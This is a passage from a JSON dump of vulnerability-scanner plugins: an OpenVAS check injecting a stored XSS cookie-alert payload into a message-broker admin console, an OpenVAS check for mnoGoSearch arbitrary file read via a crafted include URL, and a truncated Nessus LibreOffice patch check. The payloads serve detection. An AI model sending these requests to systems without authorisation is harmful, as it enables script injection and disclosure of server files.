\"pt%3Ealert%28document.cookie%29%3C%2Fscript%3\",\n \"E&JMSMessageCount=1&JMSMessageCountHeader=JMS\",\n \"XMessageCounter&JMSText=\");\n\n req = string( \"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Cookie: JSESSIONID=\", cookie[1], \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen( postData ),\"\\r\\n\",\n \"\\r\\n\",\n postData );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( res && res =~ \"HTTP/1\\.[01] 302\" && res =~ \"Location:.*/admin/queues.jsp\" ) {\n\n url = \"/admin/browse.jsp?JMSDestination=xss-test\";\n\n for( i = 0; i < 3; i++ ) {\n if( http_vuln_check( port:port, url:url, check_header:TRUE, pattern:\"<script>alert\\(document\\.cookie\\)</script>\", extra_check:\"SCHEDULED_CRON\" ) ) {\n\n ## Delete the stored content\n url = \"/admin/queues.jsp\";\n req = http_get( item:url, port:port );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( res && res =~ \"HTTP/1\\.[01] 200\" ) {\n\n secKey = eregmatch( string:res, pattern:\"<input type=.hidden. name=.secret. value=.([a-z0-9\\-]+)\" );\n if( ! secKey[1] ) exit( 0 );\n\n cookie = eregmatch( pattern:\"Set-Cookie: JSESSIONID=([0-9a-z]*);\", string:res );\n if( ! cookie[1] ) exit( 0 );\n\n url = string( \"/admin/deleteDestination.action?JMSDestination=xss-test&JMSDestinationType=queue&secret=\", secKey[1] );\n\n req = string( \"GET \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Cookie: JSESSIONID=\", cookie[1], \"\\r\\n\\r\\n\" );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( res && res =~ \"HTTP/1\\.[01] 302\" && res =~ \"Location:.*/admin/queues.jsp\" && \"xss-test\" >!< res ) {\n security_message( port:port );\n exit( 0 );\n }\n }\n }\n }\n }\n}\n\nexit( 99 );", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-22T16:42:12", "bulletinFamily": "scanner", "description": "This host is running mnoGoSearch and is prone to multiple\n vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-03-15T00:00:00", "id": "OPENVAS:1361412562310803438", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803438", "title": "mnoGoSearch Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mnogosearch_mult_vuln.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# mnoGoSearch Multiple Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803438\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2011-5235\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-15 11:19:57 +0530 (Fri, 15 Mar 2013)\");\n script_name(\"mnoGoSearch Multiple Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/52401\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1028247\");\n script_xref(name:\"URL\", value:\"http://en.securitylab.ru/lab/PT-2013-17\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/24630\");\n script_xref(name:\"URL\", value:\"http://www.mnogosearch.org/doc33/msearch-changelog.html\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/120650/mnoGoSearch-3.3.12-Arbitrary-File-Read.html\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\", \"os_detection.nasl\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary\n HTML or web script in a user's browser session in context of an affected\n site and disclose the content of an arbitrary file.\");\n script_tag(name:\"affected\", value:\"mnoGoSearch Version 3.3.12 and prior\");\n script_tag(name:\"insight\", value:\"Multiple flaws due to,\n\n - Error when parsing certain QUERY_STRING parameters.\n\n - Input passed via 'STORED' parameter to search/index.html (when 'q' is set\n to 'x') is not properly sanitized before being returned to the user.\");\n script_tag(name:\"solution\", value:\"Update to mnoGoSearch 3.3.13 or later.\");\n script_tag(name:\"summary\", value:\"This host is running mnoGoSearch and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_xref(name:\"URL\", value:\"http://www.mnogosearch.org/download.html\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nport = get_http_port(default:80);\n\nforeach dir (make_list_unique(\"/\", \"/cgi-bin\", \"/mnogosearch\", cgi_dirs(port:port)))\n{\n\n if( dir == \"/\" ) dir = \"\";\n\n ## Request for the search.cgi\n sndReq = http_get(item:dir + \"/search.cgi\", port:port);\n rcvRes = http_keepalive_send_recv(port:port, data:sndReq, bodyonly:TRUE);\n\n if(rcvRes && \">mnoGoSearch:\" >< rcvRes)\n {\n files = traversal_files();\n\n foreach file (keys(files))\n {\n url = dir + '/search.cgi/%0A%3C!--top--%3E%0A%3C!INCLUDE%20CONTENT=%22file:/' +\n files[file] + '%22%3E%0A%3C!--/top--%3E?-d/proc/self/environ';\n\n if(http_vuln_check(port:port, url:url, pattern:file))\n {\n security_message(port:port);\n exit(0);\n }\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:22:24", "bulletinFamily": "scanner", "description": "This update fixes memory corruption vulnerability in DOCM import and data exposure using crafted OLE objects.", "modified": "2018-11-10T00:00:00", "id": "OPENSUSE-2014-540.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77693", "published": "2014-09-16T00:00:00", "title": "openSUSE Security Update : LibreOffice (openSUSE-SU-2014:1126-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-540.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77693);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/10 11:50:02\");\n\n script_cve_id(\"CVE-2013-4156\", \"CVE-2014-3575\");\n\n script_name(english:\"openSUSE Security Update : LibreOffice (openSUSE-SU-2014:1126-1)\");\n script_summary(english:\"Check for the openSUSE-2014-540 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes memory corruption vulnerability in DOCM import and\ndata exposure using crafted OLE objects.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=831578\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=893141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-09/msg00020.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected LibreOffice packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-base-drivers-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-base-drivers-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-base-drivers-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-base-drivers-postgresql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-base-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-calc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-calc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-calc-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-draw\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-draw-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-draw-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-draw-extensions-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-filters-optional\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-filters-optional-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-ast\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-bg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-da\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-en-GB\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-en-US\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-en-ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-et\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-eu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-gl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-gu-IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-hi-IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-km\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-mk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-nb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-pt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-pt-BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-sv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-vi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-zh-CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-help-zh-TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-icon-theme-crystal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-icon-theme-galaxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-icon-theme-hicontrast\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-icon-theme-oxygen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-icon-theme-tango\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-icon-themes-prebuilt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-impress\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-impress-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-impress-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-impress-extensions-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-kde-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-kde4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-af\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-am\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-as\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ast\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-be-BY\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-bg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-br\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-cy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-da\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-en-GB\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-en-ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-eo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-et\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-eu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ga\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-gl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-gu-IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-he\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-hi-IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-hr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-is\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ka\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-km\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-kn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-lt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-mk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-mr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-nb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-nn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-nr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-om\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-or\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-pa-IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-prebuilt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-pt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-pt-BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-rw\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-sh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-sr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-st\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-sv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ta\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-te\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-tg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-th\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-uk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-ve\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-vi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-xh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-zh-CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-zh-TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-l10n-zu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-mailmerge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-math\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-math-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-officebean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-officebean-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-pyuno\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-pyuno-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-sdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-sdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-writer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-writer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreoffice-writer-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-base-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-base-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-base-drivers-mysql-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-base-drivers-mysql-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-base-drivers-postgresql-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-base-drivers-postgresql-debuginfo-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-base-extensions-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreoffice-branding-upstream-3.6.3.2.4-2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", 